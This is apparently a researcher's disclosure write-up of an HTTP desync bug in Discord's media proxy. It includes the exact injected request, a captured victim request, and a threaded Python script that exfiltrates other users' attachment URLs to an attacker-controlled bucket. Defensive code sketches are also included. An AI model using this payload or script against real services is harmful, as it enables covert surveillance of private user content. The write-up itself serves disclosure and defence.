tmctmt

HTTP desync in Discord's media proxy: Spying on a whole platform

In 2022, I came across a quirky behavior on media.discordapp.net when I miskeyed a space character into an attachment link: a 502 Bad Gateway.


After some fiddling, I realized that this was caused by an HTTP injection bug in the media proxy’s request to the upstream GCP bucket. The space character corrupted the proxied HTTP message, which caused the connection to terminate prematurely.

For example, a crafted user request to the media proxy would look like this:

GET /attachments/a%20b HTTP/1.1
Host: media.discordapp.net

And it would trigger an upstream request from the backend like so, which is invalid HTTP:

GET /attachments/a b HTTP/1.1
Host: discord.storage.googleapis.com

The server also happily passed on control characters like line feeds, which made it possible to inject headers and to queue additional requests into the pipeline.
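To make the decoding problem concrete, here is a minimal sketch of how a proxy could end up forwarding a broken request line. It is not Discord's actual code (I never saw it); the function names `naive_request_head` and `safer_request_head` are hypothetical, and the sketch simply assumes the proxy percent-decodes the path and pastes it into the upstream request unchanged.

```python
from urllib.parse import quote, unquote

UPSTREAM = "discord.storage.googleapis.com"

def naive_request_head(encoded_path: str, upstream_host: str) -> str:
    """Unsafe: decode the client's path, then interpolate it verbatim."""
    decoded = unquote(encoded_path)
    return f"GET {decoded} HTTP/1.1\r\nHost: {upstream_host}\r\n\r\n"

def safer_request_head(encoded_path: str, upstream_host: str) -> str:
    """Safer: re-encode the decoded path before it reaches the wire."""
    decoded = unquote(encoded_path)
    # quote() escapes spaces, line feeds and other unsafe bytes; '/' is kept.
    return f"GET {quote(decoded, safe='/')} HTTP/1.1\r\nHost: {upstream_host}\r\n\r\n"

# A decoded space splits the request line into four tokens instead of three.
print(repr(naive_request_head("/attachments/a%20b", UPSTREAM)))

# A decoded line feed ends the request line early and starts a new header line.
print(repr(naive_request_head("/attachments/a%0AHost:x", UPSTREAM)))

# Re-encoding keeps the whole path inside the request line.
print(repr(safer_request_head("/attachments/a%0AHost:x", UPSTREAM)))
```

The point of the second function is only that the decoded path has to be escaped again (or rejected) before it is written upstream; either approach would have closed the hole described here.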

I used this to load in a few images from my bucket by overriding the Host header, which was amusing for about five seconds.

A while later, I realized that the GCP connections were probably being pulled from a shared pool and put back into circulation once a request had been processed. That would make sense logistically: you’d wanna spare users the extra round trips that come with opening a new connection.

This gave me a wild idea: what if I enqueued a PUT request for my bucket with an oversized Content-Length? Would the next borrower’s request on that GCP connection be treated as part of the body and uploaded into the file?

As it turned out, yes. This is pretty much the premise of an HTTP desync attack.

I sent the following request to the media proxy:

GET /attachments/%20HTTP/1.1%0AHost:x%0A%0APUT%20/request.txt%20HTTP/1.1%0AHost:myevilbucket.storage.googleapis.com%0AContent-Length:250%0A%0A HTTP/1.1
Host: media.discordapp.net

Which caused the backend to send out these two requests to GCP:

GET /attachments/ HTTP/1.1
Host:x

PUT /request.txt HTTP/1.1
Host:myevilbucket.storage.googleapis.com
Content-Length:250

 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.6; rv:92.0) Gecko/20100101 Firefox/92.0
Host: discord.storage.googleapis.com

The PUT request expected 250 bytes of data but only 150 were given, meaning that the deficit would be eaten from whatever gets written to the stream next, i.e., the next borrower’s request.
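The framing logic behind this can be sketched with a toy parser. This is a simulation over an in-memory byte string, not real network code: `split_requests` is a hypothetical helper, the hostnames are made up, and CRLF line endings are used throughout for simplicity. It only assumes what HTTP/1.1 specifies, namely that a receiver reads exactly Content-Length bytes of body before looking for the next request.

```python
def split_requests(stream: bytes) -> list[tuple[str, bytes]]:
    """Toy HTTP/1.1 framing: return (request line, body) pairs from a byte stream."""
    parsed = []
    pos = 0
    while pos < len(stream):
        head_end = stream.find(b"\r\n\r\n", pos)
        if head_end == -1:
            break  # incomplete header block
        lines = stream[pos:head_end].decode("latin-1").split("\r\n")
        length = 0
        for line in lines[1:]:
            name, _, value = line.partition(":")
            if name.strip().lower() == "content-length":
                length = int(value.strip())
        body_start = head_end + 4
        # A real server would block here until `length` bytes have arrived;
        # the toy just takes whatever is already in the buffer.
        parsed.append((lines[0], stream[body_start:body_start + length]))
        pos = body_start + length
    return parsed

# What the attacker leaves on the pooled connection: a PUT that claims more
# body than it actually carries.
attacker = (
    b"PUT /request.txt HTTP/1.1\r\n"
    b"Host: attacker-bucket.example\r\n"
    b"Content-Length: 250\r\n\r\n"
    b" leftover"
)
# What the next borrower of the same connection writes.
victim = b"GET /attachments/1/2/image.jpg HTTP/1.1\r\nHost: upstream.example\r\n\r\n"

for request_line, body in split_requests(attacker + victim):
    print(request_line, "->", body)
```

On its own, the victim's bytes parse as one GET request. Placed after the attacker's bytes, they are never seen as a request at all: they are counted toward the PUT body, which is exactly how another user's request ended up in my file.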

And sure enough, when I checked a few moments later, my request.txt had an attachment link in it that I’d never seen before:

 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.6; rv:92.0) Gecko/20100101 Firefox/92.0
Host: discord.storage.googleapis.com

GET /attachments/10032788*********/101624143721*******/image.jpg HTTP/1.1

This meant that I could snoop in on media.discordapp.net’s global traffic and see all attachments that were being viewed in real-time, regardless of whether they were sent in public servers or private DMs. Scary stuff.

And the process wasn’t hard to scale either; it just required threading and more files to fill with incoming requests:

from googleutils import generate_signed_url
from urllib.parse import urlsplit
from threading import Thread
import requests

CONCURRENCY = 10
CONTENT_LENGTH = 250
BUCKET_NAME = 'myevilbucket'

cache = set()

def exfiltrator(read_url, write_url):
    rs = requests.Session()

    parts = urlsplit(write_url)
    # Escape '%' in the signed query string so it survives the proxy's URL-decoding pass
    query = parts.query.replace('%', '%25')

    exploit_url = (
        'https://media.discordapp.net/attachments/%20HTTP/1.1%0aHost:storage.cloud.google.com%0a%0a'
        f'PUT%20%2F{parts.path}%3F{query}%20HTTP/1.1%0a'
        f'Host:{parts.hostname}%0a'
        f'Content-Length:{CONTENT_LENGTH}%0a%0a'
    )

    while True:
        rs.get(exploit_url)
        request = rs.get(read_url).text
        if 'GET ' not in request:
            continue  # nothing was captured this round
        url = 'https://media.discordapp.net' + request.split('GET ')[1].split(' ')[0]
        if url not in cache:
            cache.add(url)
            print(url)

for num in range(CONCURRENCY):
    path = f'request{num}.txt'
    read_url = generate_signed_url(
        'credentials.json', BUCKET_NAME, path)
    write_url = generate_signed_url(
        'credentials.json', BUCKET_NAME, path,
        http_method='PUT')
    Thread(target=exfiltrator, args=(read_url, write_url)).start()

You’re looking at attachments as they’re being accessed in real time by people around the world. Isn’t that insane??

Definitely one of the coolest and most impactful bugs I’ve found, though to this day I still don’t understand what caused it, since no halfway-decent request library would let you inject control characters into your messages. Perhaps they were working with raw sockets?
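For comparison, this is roughly the kind of check I'd expect a request library to run before writing a request line. It is a minimal sketch, not any particular library's implementation: `validate_request_target` is a hypothetical name, and the character range (ASCII control characters, space, and DEL) is my assumption of a sensible blocklist.

```python
import re

# ASCII control characters, space, and DEL never belong in a request target.
_DISALLOWED = re.compile(r"[\x00-\x20\x7f]")

def validate_request_target(target: str) -> str:
    """Return the target unchanged, or raise if it could break HTTP framing."""
    match = _DISALLOWED.search(target)
    if match:
        raise ValueError(
            f"request target contains disallowed character {match.group()!r}"
        )
    return target

print(validate_request_target("/attachments/a%20b"))  # still encoded, so accepted

for bad in ("/attachments/a b", "/attachments/a\nHost:x"):
    try:
        validate_request_target(bad)
    except ValueError as exc:
        print("rejected:", exc)
```

A check like this on the decoded path would have turned both the stray space and the injected line feeds into a clean error instead of bytes on the upstream connection.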

Also, in theory it might have been possible to send back spoofed responses to users’ requests, but I never confirmed this.

Timeline
